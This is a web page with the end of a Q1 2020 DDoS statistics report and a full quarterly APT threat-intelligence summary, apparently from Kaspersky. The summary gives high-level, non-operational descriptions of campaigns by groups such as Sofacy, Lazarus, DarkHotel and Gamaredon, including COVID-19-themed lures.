!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Dynamics of the number of DDoS attacks in Q1 2020 (download)

In the past quarter, the number of attacks on Mondays increased significantly — by almost 4 p.p. If in the previous reporting period this day accounted for only about 14% of attacks, it now commands close to 18%. The calmest day of the quarter was Wednesday (a fraction over 11% of attacks, down 3.7 p.p. on the previous quarter), lagging only slightly behind (by 1.5 p.p.) the previous rating’s anti-leader in terms of attack intensity, Thursday.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by day of the week, Q4 2019 and Q1 2020 (download)

Types of DDoS attacks

The past quarter has seen some noticeable changes in the distribution of DDoS attacks by type: ICMP flooding added 2 p.p. and confidently moved from last to second place (3.6% against 1.6% in the previous reporting period). Accordingly, HTTP flooding finished bottom with its lowest score since January 2019 (a mere 0.3%). UDP and TCP flooding once again swapped places. The only non-mover was the top-placed SYN flooding, whose share continued to grow and reached a record high of 92.6% for the observation period (beating the previous record of 84.6% set last quarter).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by type, Q1 2020 (download)

Windows botnets are becoming more popular. If in the last reporting period they snatched just 0.35 p.p. from their Linux cousins, this time they took a 3 p.p. slice (up from 2.6% to 5.64% of attacks). That said, they are still far being a serious competitor: 9 out of 10 attacks continue to deploy Linux botnets (94.36%).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Ratio of Windows/Linux botnet attacks, Q4 2019 and Q1 2020 (download)

Conclusion

Q1 2020 did not bring any major shocks. The TOP 10 countries by number of C&C servers welcomed two new entries (Croatia and Singapore) and saw the return of two familiar faces (Romania and Germany). Although we observed some growth in Windows botnets and ICMP floods, this did not significantly affect the overall picture. Only the distribution of attacks by day of the week changed substantially, but even that points only to a redistribution of efforts, not a quantitative shift. The rise in the number of DDoS attacks on St Valentine’s Day followed by a lull was also a predictable seasonal phenomenon.

2020. április 30.

APT trends report Q1 2020

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2020.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com’.

Given the exceptional situation the world is living in because of the COVID-19 pandemia, it is mandatory we to start with a summary of how APT groups have been abusing this topic for different types of attacks.

COVID-19 APT activity

Since the World Health Organization (WHO) declared the COVID-19 a pandemic, this topic has received increased attention from different attackers. Many of the phishing scams we’ve seen have been launched by cybercriminals trying to cash-in on people’s fears about the virus.  However, the list of attackers also includes APT threat actors such as Kimsuky, APT27, Lazarus or ViciousPanda who, according to OSINT, have used COVID-19-themed lures to target their victims. We recently discovered a suspicious infrastructure that could have been used to target health and humanitarian organizations, including the WHO. Even though the infrastructure cannot be attributed to any particular actor at the moment, and was registered before the COVID-19 crisis in June 2019, according to some private sources it might be related to the DarkHotel actor. However, we cannot confirm this information at the moment. Interestingly, some groups have used the current situation to try to soften their reputation by declaring that they would not target health organizations during the crisis.

There are different publications reporting activity related to other APT actors using this lure, but in general, we do not believe this implies a meaningful change in terms of TTPs other than using a trendy topic for luring victims. We are closely monitoring the situation.

The most remarkable findings

In January 2020, we discovered a watering-hole utilizing a full remote iOS exploit chain. This site appears to have been designed to target users in Hong Kong, based on the content of the landing page. While the exploits currently being used are known, the actor responsible is actively modifying the exploit kit to target more iOS versions and devices. We observed the latest modifications on February 7. The project is broader than we initially thought, supporting an Android implant, and probably supporting implants for Windows, Linux, and MacOS. For the time being, we are calling this APT group TwoSail Junk. We believe this is a Chinese-speaking group; it maintains infrastructure mostly within Hong Kong, along with a couple of hosts located in Singapore and Shanghai. TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads ofтtheir own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.

Russian-speaking activity

In January, a couple of recently compiled SPLM/XAgent modules were detected in an Eastern European telecoms company. The initial point of entry is unknown, as is their lateral movement within this organization. It has become rare to identify SPLM infections, compared to past levels of Sofacy activity, so it seems that portions of this network may have been infected for some time. In addition to these SPLM modules, Sofacy also deployed .NET XTUNNEL variants and their loaders. These 20KB XTUNNEL samples themselves seem minimal in comparison to past XTUNNEL samples, which weighed in at 1-2MB. This shift to C# by the long-standing Sofacy XTunnel codebase reminds us of Zebrocy’s practice of re-coding and innovating long-used modules in multiple languages.

Gamaredon, a well-known APT group that has been active since at least 2013, has traditionally focused on Ukrainian entities. In recent months we have observed a campaign, made up of different waves, that has also been reported by multiple researchers on different social networks. The attackers sent malicious documents with remote template injection, resulting in a multi-level infection scheme to deploy a malicious loader that periodically contacts a remote C2 to download additional samples. Based on past research, we know that the Gamaredon’s toolkit includes many different malware artefacts, developed to achieve different goals. These include scanning drives for specific system files, capturing screenshots, executing remote commands, downloading additional files and managing the remote machine with programs such as UltraVNC. In this case, we observed an interesting new second stage payload that includes spreading capabilities, that we call “Aversome infector”. This malware seems to have been developed to maintain a strong persistence in the target network and to move laterally by infecting Microsoft Word and Excel documents on external drives.

Chinese-speaking activity

CactusPete is a Chinese-speaking cyber-espionage group active since at least 2012 characterized by medium-level technical capabilities. Historically, this threat actor has targeted organizations within a limited range of countries – South Korea, Japan, the US and Taiwan. At the end of 2019 the group seemed to shift towards a heavier focus on Mongolian and Russian organizations. CactusPete offensive activity against the Russian defense industry and Mongolian government appears to be mostly delineated from its Russian-Mongolian commercial and border relationships. However, one bait exploit document dropping its Flapjack backdoor (tmplogon.exe, primarily focused on new Russian targets) is authored in Mongolian. The group’s broadening of techniques, exploit re-purposing, targeting shift and possible expansion suggests changes in the group’s resources and operations.

Rancor is a group that has been publicly reported since 2018, with connections to DragonOK. This actor traditionally had a focus on Southeast Asian targets, namely Cambodia, Vietnam and Singapore. We noted several updates to the group’s activity in the last few months, namely the discovery of a new variant of the Dudell malware that we are calling ExDudell, a new tool for bypassing UAC (User Account Control), and new infrastructure utilized in the attacks. Apart from this, we have also identified that the initial lure documents that were previously sent via mail, are now found in the Telegram Desktop directory, suggesting the group is possibly making a shift in its initial delivery method.

In 2019, we detected activity by an unknown actor at the time deploying watering holes on websites representing Tibetan interests, fooling victims into installing fake Adobe Flash updates hosted on a GitHub repository. Kaspersky thwarted the attack by coordinating a takedown of this repository with GitHub. After a brief period of inactivity, we detected a new round of watering holes featuring a renewed toolset. We decided to call the group behind this activity Holy Water.

The threat actor’s unsophisticated but creative toolset has been evolving a lot since the inception date, may still be in development, and leverages Sojson obfuscation, NSIS installer, Python, open-source code, GitHub distribution, Go language, as well as Google Drive-based C2 channels.

Middle East

We recently detected a new, ongoing data exfiltration campaign targeting victims in Turkey that started in February 2020. While StrongPity’s TTPs in terms of targeting, infrastructure and infection vector haven’t changed, we observed a somewhat peculiar change in the documents they attempt to exfiltrate. In this campaign, StrongPity updated its latest signature backdoor, named StrongPity2, and added more files to exfiltrate to its list of common Office and PDF documents, including Dagesh Pro Word Processor files used for Hebrew dotting, RiverCAD files used for river flow and bridge modelling, plain-text files, archives as well as GPG encrypted files and PGP keys.

In March, we discovered a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. The first signs of this operation, which we have dubbed WildPressure, can be traced back to August 2019; still, the campaign remains active. The Milum samples we have seen so far do not share any code similarities with any known APT campaigns. The malware provides attackers with remote control over infected devices, allows downloading and executing commands, collecting and exfiltrating information and installing upgrades in the malware.

In late December 2019, Kaspersky Threat Attribution Engine detected a new variant of the Zerocleare wiper that had possibly been used in targeted attacks on energy sector targets in Saudi Arabia. This quarter, we identified a new variant of this wiper, called Dustman. It is similar to Zerocleare in terms of wiping and distribution, but changes in variables and technical names suggest this might have been in readiness for a new wave of attacks specifically targeting Saudi Arabia’s energy sector, based on messages embedded in the malware and the mutex created by it. The PDB file of the Dustman wiper suggested that this destructive code was the release edition and was ready for deployment in a target network. These changes coincided with the New Year holidays, during which many employees take time off to celebrate. Shamoon was delivered with similar timing in 2012 during Ramadan celebrations.

Southеast Asia and Korean Peninsula

A Lazarus campaign outlined by the Italian security company Telsy in November 2019 allowed us to find a connection to previous activity from the group targeting cryptocurrency businesses. The malware mentioned on Telsy’s blog is a first stage downloader that has been observed since mid-2018. We found that the second stage malware is a variant of Manuscrypt, uniquely attributed to Lazarus, deploying two types of payloads. The first is a manipulated Ultra VNC program, and the second is a multi-stage backdoor. This type of multi-stage infection procedure is typical of the Lazarus group’s malware, especially when using the Manuscrypt variant. In this campaign, our telemetry indicates that the Lazarus group attacked cryptocurrency businesses in Cyprus, the US, Taiwan and Hong Kong, and the campaign extended until the beginning of 2020.

Kimsuky, an actor we have been tracking since 2013, was especially active during 2019. In December, Microsoft took down 50 domains used by the group and filed a lawsuit against the attackers in a Virginia court. However, the group has continued its activity without significant changes. We recently discovered a new campaign where the actor used a decoy image themed around New Year’s greetings that delivers its old downloader with a new evolved next-stage payload designed to steal information that uses a new encryption method.

At the end of January, we stumbled upon a malicious script exploiting an Internet Explorer vulnerability, CVE-2019-1367. After closely examining the payload and finding connections with previous activity, we concluded that DarkHotel was behind this campaign, probably in progress since 2018. The campaign saw DarkHotel utilize a multi-stage binary infection phase using home-brewed malware. The initial infection creates a downloader which fetches another downloader to collect system information and fetch the final backdoor only for high-value victims. DarkHotel used a unique combination of TTPs in this campaign. The threat actor used diverse infrastructure to host malware and to control infected victims, including a compromised web server, a commercial hosting service, a free hosting service and a free source code tracking system. We were able to confirm targeted companies in South Korea and Japan in this campaign.

In March, researchers from Google revealed that a group of hackers used five zero-days to target North Koreans and North Korean-focused professionals in 2019. The group exploited flaws in Internet Explorer, Chrome, and Windows with phishing emails that carried malicious attachments or links to malicious sites, as well as watering-hole attacks. We were able to match two of the vulnerabilities – one in IE and one in Windows – to DarkHotel.

FunnyDream is a campaign that started in mid-2018, targeting high-profile entities in Malaysia, Taiwan and the Philippines, with the majority of victims in Vietnam. Our analysis revealed that it’s part of a wider campaign that stretches back a few years and targets governments, and specifically foreign organizations, of countries in Southeast Asia. The attacker’s backdoor downloads and uploads files from/to a C2, executes commands and runs new processes in the victim. It also collects information about other hosts on the network and is delivered to new hosts through remote execution utilities. The attacker also used an RTL backdoor and Chinoxy backdoor. The C2 infrastructure has been active since mid-2018 and domains show an overlap with the FFRAT malware family. In a number of cases, indications suggest the backdoor was delivered via a previous long-term compromise. The campaign is still active.

Operation AppleJeus was one of the more notable campaigns of Lazarus, and the first time the actor targeted macOS targets. Our January follow-up research revealed significant changes to the group’s attack methodology: homemade macOS malware and an authentication mechanism to carefully deliver the next-stage payload, as well as loading the next-stage payload without touching the disk. To attack Windows victims, the group has elaborated a multi-stage infection procedure and significantly changed the final payload. We believe that Lazarus has been more careful in its attacks since the release of Operation AppleJeus and has employed a number of methods to avoid detection. We identified several victims in the UK, Poland, Russia and China. Moreover, we were able to confirm that several of the victims are linked to cryptocurrency organizations.

Roaming Mantis is a financially motivated actor first reported in 2017, when it used SMS to distribute its malware to Android devices based in South Korea. Since then, the scope of the group’s activities has widened considerably, supporting 27 languages, targeting iOS as well as Android, and even mining cryptocurrency. The actor also added new malware families, including Fakecop and Wroba.j to its arsenal, and is still active using ‘SMiShing‘ for Android malware distribution. In a recent campaign it distributed malicious APKs masquerading as popular couriers and customized for the targeted countries, including Japan, Taiwan, South Korea and Russia.

Other interesting discoveries

TransparentTribe started using a new module named USBWorm at the beginning of 2019, as well as improving its custom .NET tool named CrimsonRAT. Based on our telemetry, USBWorm was used to infect thousands of victims, most of them located in Afghanistan and India, providing the attacker with the ability to download and execute arbitrary files, spread to removable devices and steal files of interest from infected hosts even those disconnected from the internet. As we previously reported, this group mainly focuses on military targets, which are usually compromised with Office documents armed with malicious VBA and open-source malware like Peppy RAT and CrimsonRAT. In its new campaign, which is still active, we noticed the group’s focus shift more towards targeting entities located in Afghanistan in addition to India. Transparent Tribe has also developed a new implant designed to infect Android devices, a modified version of the AhMyth Android RAT which is open source malware available on GitHub.

During the last months of 2019, we observed an ongoing campaign conducted by Fishing Elephant. The group continues to use both Heroku and Dropbox in order to deliver its tool of choice, AresRAT. We discovered that the actor incorporated a new technique into its operations that is meant to hinder manual and automatic analysis – geo-fencing and hiding executables within certificate files. During our research, we also detected a change in victimology that may reflect the current interests of the threat actor: the group is targeting government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine and China.

Final thoughts

While the threat landscape isn’t always full of “groundbreaking” events, when we cast our eyes back over the activities of APT threat actors, there are always interesting developments.  Our regular quarterly reviews are intended to highlight the key developments.

These are some of the main trends that we’ve seen this year so far.

All in all, we see the continuous growth of activity in Asia and how some of the actors we called newcomers are now well established. On the other hand, the more traditional advanced actors seem to be more and more selective in their operations, probably following a change of paradigm. The use of mobile platforms for infections and the distribution of malware is on the rise. Every actor seems to have some artefacts for these platforms and in some campaigns they are the main target.

COVID-19 is clearly top of everyone’s minds at the moment and APT threat actors have also been seeking to exploit this topic in spear-phishing campaigns.  We do not believe this represents a meaningful change in terms of TTPs: they’re simply using it as a newsworthy topic to lure their victims. However, we are closely monitoring the situation.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.